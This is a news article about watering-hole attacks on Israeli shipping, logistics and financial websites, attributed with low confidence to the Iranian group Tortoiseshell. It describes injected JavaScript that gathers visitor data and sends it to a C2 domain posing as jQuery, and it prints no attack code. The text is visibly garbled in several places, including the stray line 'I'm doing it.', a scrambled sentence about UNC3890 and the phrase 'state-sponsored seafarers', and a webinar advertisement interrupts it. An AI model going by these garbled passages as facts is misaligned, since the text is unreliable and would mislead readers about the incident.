At least eight websites associated with Israeli shipping, logistics and financial services companies were targeted as part of the watering hole attacks.
ClearSky, a Tel Aviv-based cybersecurity firm, has low confidence that the attack was carried out by an Iranian actor tracked as Tortoiseshell (also known as Crimson Sandstorm (formerly Curium), Imperial Kitten, and TA456). I’m doing it.
“The infected site collects preliminary user information through a script,” ClearSky said in a technical report released Tuesday. Most of the affected websites have had their malicious code removed.
Tortoiseshell has been known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. They have also been observed setting up fake recruitment websites to trick US military veterans into downloading remote access Trojans.
However, this is not the first time an Iranian activity cluster has set up a watering hole and set its sights on the Israeli shipping sector.
This attack technique, also known as strategic website compromise, compromises websites known to be frequently visited by user groups or users within a particular industry, enabling malware distribution.
In August 2022, an emerging Iranian actor named UNC3890 was hosted on the login page of a legitimate Israeli shipping company designed to send preliminary data about logged-in users to an attacker-controlled domain. was allegedly involved in a watering hole where
A recent intrusion documented by ClearSky shows malicious JavaScript injected into a website working in a similar fashion, gathering information about the system and sending it to a remote server.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
Reserve your seat!
The JavaScript code also attempts to determine the user’s language preference, which ClearSky said could “help an attacker customize attacks based on the user’s language.”
Additionally, the attack leverages a domain named jquery-stack.[.]Online for Command and Control (C2). The goal is to be unobtrusive by masquerading as the canonical jQuery JavaScript framework.
The development comes as Israel continues to be the most prominent target for Iranian state-sponsored seafarers. Earlier this month, Microsoft highlighted a new approach of combining “offensive cyber operations with multi-pronged influence operations to facilitate geopolitical change in line with the administration’s objectives.”
